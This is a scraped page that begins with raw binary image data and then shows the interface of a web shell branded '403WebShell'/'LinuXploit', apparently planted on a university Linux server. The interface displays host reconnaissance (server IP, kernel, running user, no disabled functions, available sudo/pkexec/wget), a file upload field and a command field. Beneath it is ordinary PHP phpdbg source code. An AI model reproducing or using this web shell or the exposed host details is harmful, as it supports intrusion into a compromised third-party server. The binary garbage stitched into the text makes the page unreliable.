RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð �PNG  ��� IHDR���0���0����`n���� cHRM��z&��������������u0���`��:���p��Q<���bKGD�������������tIME� 6���� AIDATX��]pU����{��{�G�n$$@ -�-jВAک��P��1O���j��:cU|hg�}�C�ʋU�:�A A�����|$$$������}�^}8i *�د�?w�9gݵ��:{��F"��&��4� �@��@q_����Ow��9<<|�ԩ�;w���"�#GV�^}Ճ7�|s˖-{��|��G�-[��R�Q�aőTR)� �2!�e�63��X�U������{��Z�m۶�^}�5����}����v�퟇R��J�J,�$� B�$Ф")�i��D�9+䜆B.�qf�үÇoذaժU�i>��so����a^���۷����3�<�ꫯnݺ��"���\���gn0�h��B�i� hR��,W*�e�65��LS�ر�0ēO>���755���ι@O?��ҥK������:::����1��X�9S�%�'�I���$��Sg�ڥ3'zF/� ��Z�8ES6WZ#�. �\��P�R�2����-[�,_�|�`�j�Xl6M���b�Z�* �jҟ0��҉B""� y22r�ܹ�CG�;���{7nn��ma���������2S���� <��x�⡡�|p.Pw��x��y�C�=��O� ��CB}�ӵ����?�wq`8�e����{+Չɱ�\{&� LL������vww��]��?q��Y�������P(���vuu9���S?w���ݻ�v<���mш ��D�DR&�j�X�����y񪂬�>���dyg�7��b��s�p��E���BDR� t����������=w�\�[;:[&._�Dlڸv�]�� u�驚�/Y�a�����d�%��*)1� �V\G���[F]����X���i����J:z�N�9�?xϭ+X�V|���U�n� �g���hҜ�b�aҢ ^��j�f�ZV�K��w.�ؾp�}{� �/e��{O�o�����R�8���i� !jB`�3n;Mw.=7�S�'��F�y W��x�}LXNfz���� �b�p�b�bq~�����s�4�H�2��q^�r�� n���\aFf4�����n�c��Q�n�X�,����ӑҤd5DDDd 9'd��,�l��.���)?��������#}C�k����ܖq����m�a��y��8D���,K)�I�$I�8NE�aH)�|�VCDƘ��DF0D@M �"3�+�����Kcú��+n}��-�k:W�K������3ƄRʌ��m۞��q�9WJ���d�0�, �8��ٶ�⦈B�h���䩡�eDCj&$ �1�Y��\�>{~`�M����ͷt�#?VZ'@D²l"�,+�ɤc0�r��R*��X��n�_kMD�1"""ι�:%X��� $�b:i�b4 �X<�/"r�����[Vo��T��0V�i���sΓ$IG���4M�c �R�eq��QS�+5{�{�,��a"� �D�2�CҐ(I`CS�s�ʥ�R&�p�����۴(�N���e�sq�Ғ|%�����k�=�0S3@�`�i9�K��Պ�0T�Y��ؼD*��DE��2�gO�bŷrY����z�T��R�҉҆SX�Tϑ����/�Zi�eL��X��jdx䏿�eَ ���7��П"?�����0y����<��R�N8�\X9ӥx ��^�L�l�ކ��u����/���Q�B�^p�f��\3��]�INƑ�L�"--�r�! 8?���Rp~����v��|�M��$����_M �����GgF�/U�^�^p�Dk�ٲ�vM� ����L$�eGʓ01*���Two��f��#���ޱ��7��!5rdy"D��V���\ט�� [y�f ���@���Um����2w\�fg_򯯃z�y���v|`$_ow402�|���c��Zt��J��Yw��݌�b8+L����R�t߉O�xS���'�L��`/lY�� ���Z;f�nX���f��$�<���Ϩ�J��z"�y��%�qzz��(B��Y�@D�)�uS���<�\.[�����*T(�8v�̗����rrr2I�� N5w����^k=�}�:�S�yӌ��ً+�����NY碧f����0)��h. �R����4�Ա�>�X,:����c�0�0 �Rn6���mii�MW*�j��i�I�0�,ˊ��� È�8���j�$I �hkk �`||�B!b��l6�8Ncc��U��<���1f�&"FQdYV�B�b���j3�>� !��j>���g���g��RD����8���r�08�׵u�7��]3������~�,b�P���%tEXtdate:create�2025-02-07T10:02:54+00:00� t����%tEXtdate:modify�2025-02-07T10:02:54+00:00�P�6���(tEXtdate:timestamp�2025-02-07T10:02:54+00:00�E������IEND�B`� 403WebShell
403Webshell
Server IP : 128.227.220.250  /  Your IP : 216.73.216.35
Web Server : Apache/2.4.64 (Unix) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux dumont.ece.ufl.edu 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : daemon ( 2)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/source/2021/php-7.4.30/sapi/phpdbg/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /opt/source/2021/php-7.4.30/sapi/phpdbg//phpdbg_webdata_transfer.c
/*
   +----------------------------------------------------------------------+
   | PHP Version 7                                                        |
   +----------------------------------------------------------------------+
   | Copyright (c) The PHP Group                                          |
   +----------------------------------------------------------------------+
   | This source file is subject to version 3.01 of the PHP license,      |
   | that is bundled with this package in the file LICENSE, and is        |
   | available through the world-wide-web at the following url:           |
   | http://www.php.net/license/3_01.txt                                  |
   | If you did not receive a copy of the PHP license and are unable to   |
   | obtain it through the world-wide-web, please send a note to          |
   | license@php.net so we can mail you a copy immediately.               |
   +----------------------------------------------------------------------+
   | Authors: Bob Weinand <bwoebi@php.net>                                |
   +----------------------------------------------------------------------+
*/

#include "phpdbg_webdata_transfer.h"
#include "ext/standard/php_var.h"

static int phpdbg_is_auto_global(char *name, int len) {
	int ret;
	zend_string *str = zend_string_init(name, len, 0);
	ret = zend_is_auto_global(str);
	zend_string_free(str);
	return ret;
}

PHPDBG_API void phpdbg_webdata_compress(char **msg, size_t *len) {
	zval array;
	HashTable *ht;
	zval zv[9] = {{{0}}};

	array_init(&array);
	ht = Z_ARRVAL(array);

	/* fetch superglobals */
	{
		phpdbg_is_auto_global(ZEND_STRL("GLOBALS"));
		/* might be JIT */
		phpdbg_is_auto_global(ZEND_STRL("_ENV"));
		phpdbg_is_auto_global(ZEND_STRL("_SERVER"));
		phpdbg_is_auto_global(ZEND_STRL("_REQUEST"));
		array_init(&zv[1]);
		zend_hash_copy(Z_ARRVAL(zv[1]), &EG(symbol_table), NULL);
		Z_ARRVAL(zv[1])->pDestructor = NULL; /* we're operating on a copy! Don't double free zvals */
		zend_hash_str_del(Z_ARRVAL(zv[1]), ZEND_STRL("GLOBALS")); /* do not use the reference to itself in json */
		zend_hash_str_add(ht, ZEND_STRL("GLOBALS"), &zv[1]);
	}

	/* save php://input */
	{
		php_stream *stream;
		zend_string *str;

		stream = php_stream_temp_create_ex(TEMP_STREAM_DEFAULT, SAPI_POST_BLOCK_SIZE, PG(upload_tmp_dir));
		if ((str = php_stream_copy_to_mem(stream, PHP_STREAM_COPY_ALL, 0))) {
			ZVAL_STR(&zv[2], str);
		} else {
			ZVAL_EMPTY_STRING(&zv[2]);
		}
		Z_SET_REFCOUNT(zv[2], 1);
		zend_hash_str_add(ht, ZEND_STRL("input"), &zv[2]);
	}

	/* change sapi name */
	{
		if (sapi_module.name) {
			ZVAL_STRING(&zv[6], sapi_module.name);
		} else {
			Z_TYPE_INFO(zv[6]) = IS_NULL;
		}
		zend_hash_str_add(ht, ZEND_STRL("sapi_name"), &zv[6]);
		Z_SET_REFCOUNT(zv[6], 1);
	}

	/* handle modules / extensions */
	{
		zend_module_entry *module;
		zend_extension *extension;
		zend_llist_position pos;

		array_init(&zv[7]);
		ZEND_HASH_FOREACH_PTR(&module_registry, module) {
			zval *value = ecalloc(sizeof(zval), 1);
			ZVAL_STRING(value, module->name);
			zend_hash_next_index_insert(Z_ARRVAL(zv[7]), value);
		} ZEND_HASH_FOREACH_END();
		zend_hash_str_add(ht, ZEND_STRL("modules"), &zv[7]);

		array_init(&zv[8]);
		extension = (zend_extension *) zend_llist_get_first_ex(&zend_extensions, &pos);
		while (extension) {
			zval *value = ecalloc(sizeof(zval), 1);
			ZVAL_STRING(value, extension->name);
			zend_hash_next_index_insert(Z_ARRVAL(zv[8]), value);
			extension = (zend_extension *) zend_llist_get_next_ex(&zend_extensions, &pos);
		}
		zend_hash_str_add(ht, ZEND_STRL("extensions"), &zv[8]);
	}

	/* switch cwd */
	if (SG(options) & SAPI_OPTION_NO_CHDIR) {
		char *ret = NULL;
		char path[MAXPATHLEN];

#if HAVE_GETCWD
		ret = VCWD_GETCWD(path, MAXPATHLEN);
#elif HAVE_GETWD
		ret = VCWD_GETWD(path);
#endif
		if (ret) {
			ZVAL_STRING(&zv[5], path);
			Z_SET_REFCOUNT(zv[5], 1);
			zend_hash_str_add(ht, ZEND_STRL("cwd"), &zv[5]);
		}
	}

	/* get system ini entries */
	{
		zend_ini_entry *ini_entry;

		array_init(&zv[3]);
		ZEND_HASH_FOREACH_PTR(EG(ini_directives), ini_entry) {
			zval *value = ecalloc(sizeof(zval), 1);
			if (ini_entry->modified) {
				if (!ini_entry->orig_value) {
					efree(value);
					continue;
				}
				ZVAL_STR(value, ini_entry->orig_value);
			} else {
				if (!ini_entry->value) {
					efree(value);
					continue;
				}
				ZVAL_STR(value, ini_entry->value);
			}
			zend_hash_add(Z_ARRVAL(zv[3]), ini_entry->name, value);
		} ZEND_HASH_FOREACH_END();
		zend_hash_str_add(ht, ZEND_STRL("systemini"), &zv[3]);
	}

	/* get perdir ini entries */
	if (EG(modified_ini_directives)) {
		zend_ini_entry *ini_entry;

		array_init(&zv[4]);
		ZEND_HASH_FOREACH_PTR(EG(ini_directives), ini_entry) {
			zval *value = ecalloc(sizeof(zval), 1);
			if (!ini_entry->value) {
				efree(value);
				continue;
			}
			ZVAL_STR(value, ini_entry->value);
			zend_hash_add(Z_ARRVAL(zv[4]), ini_entry->name, value);
		} ZEND_HASH_FOREACH_END();
		zend_hash_str_add(ht, ZEND_STRL("userini"), &zv[4]);
	}

	/* encode data */
	{
		php_serialize_data_t var_hash;
		smart_str buf = {0};

		PHP_VAR_SERIALIZE_INIT(var_hash);
		php_var_serialize(&buf, &array, &var_hash);
		PHP_VAR_SERIALIZE_DESTROY(var_hash);
		*msg = ZSTR_VAL(buf.s);
		*len = ZSTR_LEN(buf.s);
	}

	zend_array_destroy(Z_ARR(array));
}

Youez - 2016 - github.com/yon3zu
LinuXploit